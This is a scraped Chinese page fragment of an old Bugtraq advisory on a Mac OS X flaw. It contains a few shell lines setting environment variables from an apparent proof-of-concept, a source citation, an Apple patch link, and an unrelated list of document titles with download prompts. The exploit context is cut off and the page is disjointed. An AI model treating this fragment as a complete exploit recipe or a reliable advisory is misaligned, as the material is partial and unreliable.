
HOME=/Users/kevinfinisterre; export HOME

LOGNAME=kevinfinisterre; export LOGNAME

SECURITYSESSIONID ee50; export SECURITYSESSIONID

cd /Users/kevinfinisterre

<*来源:Kevin Finisterre (dotslash@snosoft.com)

链接:marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

Apple

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.apple.com/support/downloads/securityupdate2005001macosx1028client.html

Freefloat FTP Server多个命令远程缓冲区溢出漏洞漏洞预警

如何合并多个CorelDraw文档

远程研修

微软Excel发现了高危安全漏洞

图形教案

三角形图形

多个动物的寓言故事

服务器搭建实施方案范文

服务器采购合同格式

党员远程教育软件

SAP Internet图形服务器多个远程安全漏洞(精选8篇)

欢迎下载DOC格式的SAP Internet图形服务器多个远程安全漏洞,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档